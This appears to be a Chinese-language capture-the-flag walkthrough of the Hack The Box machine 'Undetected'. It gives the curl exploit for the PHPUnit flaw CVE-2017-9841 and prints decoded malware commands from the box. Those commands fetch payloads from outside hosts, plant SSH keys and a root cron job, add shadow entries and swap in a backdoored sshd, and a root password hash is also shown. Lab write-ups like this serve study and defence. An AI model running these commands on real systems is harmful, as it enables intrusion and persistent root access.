基本信息
- https://www.hackthebox.com/home/machines/profile/439
- 10.10.11.146
data:image/s3,"s3://crabby-images/ff306/ff306d60a701f4f556346593de6337bf576e8a35" alt=""
端口扫描
22和80:
1 | nmap -sC -sV 10.10.11.146 |
80
在线商城,store是另一个子域名:
data:image/s3,"s3://crabby-images/516ec/516ec3acc9c229bd36fb482342517b3884695b08" alt=""
store.djewelry.htb
加hosts后访问:
data:image/s3,"s3://crabby-images/45a07/45a078c30bae69dec99d208b4af3f53a3b1d60b6" alt=""
目录扫描
store注册登录功能现在不能使用,进行目录扫描,发现vendor目录可直接访问:
1 | gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://store.djewelry.htb/ -x php,html,txt |
data:image/s3,"s3://crabby-images/b893b/b893ba4417a05d494bf9dab6b14737be540a333c" alt=""
PHPUnit
发现5.6版本的phpunit:
data:image/s3,"s3://crabby-images/fbf24/fbf2491327ea0b4d1582fcb737f34a61745b9bd8" alt=""
可以搜到相关漏洞:
- CVE-2017-9841: What is it, and how do we protect our customers? - OVHcloud Blog
https://blog.ovhcloud.com/cve-2017-9841-what-is-it-and-how-do-we-protect-our-customers/
CVE-2017-9841
利用漏洞执行命令,获取shell:
1 | curl -XPOST --data '<?php system("id"); ?>' http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
data:image/s3,"s3://crabby-images/fc706/fc7061c724e05eebb8fe047ee668f0fadb9fd906" alt=""
data:image/s3,"s3://crabby-images/2c3fd/2c3fdc740d8df7f2ef3b3eac505ebbeef4cff7c2" alt=""
/var/backups/info
简单的枚举可以发现一个info文件,下载下来分析:
data:image/s3,"s3://crabby-images/a9e7e/a9e7ecbe8e44a28ac5e0cfe997a45bfb3f1735db" alt=""
可以在info中发现一串编码:
data:image/s3,"s3://crabby-images/224a5/224a570e003a1ded7ac70910d6a9a96508c657b2" alt=""
data:image/s3,"s3://crabby-images/6ade1/6ade1ec5444a75f751c2e5b215ba01758dfeb1b8" alt=""
hash crack
根据解码出来的内容,可以知道是对非root用户,用户名后加1,使用指定密码hash,破解这个hash,得到复制的普通用户的密码:
1 | sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt |
data:image/s3,"s3://crabby-images/206ce/206ce0b606cb97c6466495a9440b3d83d65a256e" alt=""
data:image/s3,"s3://crabby-images/c7428/c74283213405a9d461b99d6cab7e344c429fb885" alt=""
info command
1 | wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt; |
user flag
根据/etc/passwd中的结果,有steven和steven1两个普通用户,得到的密码可以登录steven1:
data:image/s3,"s3://crabby-images/16fdc/16fdc79d60271ad59d80f7e9bb12e6b71e8a37a4" alt=""
提权信息
/var/mail/steven里有一封邮件提到apache可疑行为:
data:image/s3,"s3://crabby-images/8b216/8b21697fbf66fa3434758c572d41438ec722dde0" alt=""
mod_reader.so
查看apache模块可以发现一个时间与其他模块明显差异比较大的mod_reader.so:
data:image/s3,"s3://crabby-images/1ae65/1ae654fdbd739dba0c649ee1c70a9918cabec141" alt=""
下载下来分析,可以发现hook_post_config中一串base64:
data:image/s3,"s3://crabby-images/2816b/2816bd33c3275b9d7bfda55e542ebcbebf6ec8df" alt=""
解码可以发现是替换sshd后门:
1 | wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd |
sshd
后门sshd也下载下来分析,其中auth_password函数得到后门密码验证过程:
data:image/s3,"s3://crabby-images/75c84/75c84b8206949d18fc3ca812b75e6980511a2acc" alt=""
这里有点问题,我本地ghidra出来的backdoor结果有两部分是错误的,正确的放在后面了
然后就是按顺序排列,hex 进行异或,得到后门密码:
data:image/s3,"s3://crabby-images/e95a5/e95a52e606966500f15360a462d3e2db3f0faa68" alt=""
Password
1 | 0xa5 |
root flag
使用后门密码登录,得到root:
data:image/s3,"s3://crabby-images/5ce9f/5ce9f8170864c860d9bdb086d6050fbb522317ef" alt=""
1 | root:$6$xxydXHZzlPY4U0lU$qJDDFjfkXQnhUcESjCaoCWjMT9gAPnyCLJ8U5l2KSlOO3hPMUVxAOUZwvcm87Vkz0Vyc./cDsb2nNZT0dYIbv.:19031:0:99999:7::: |
参考资料
- CVE-2017-9841: What is it, and how do we protect our customers? - OVHcloud Blog
https://blog.ovhcloud.com/cve-2017-9841-what-is-it-and-how-do-we-protect-our-customers/ - Undetected - discussion | RaidForums
https://raidforums.com/Thread-Tutorial-Undetected-discussion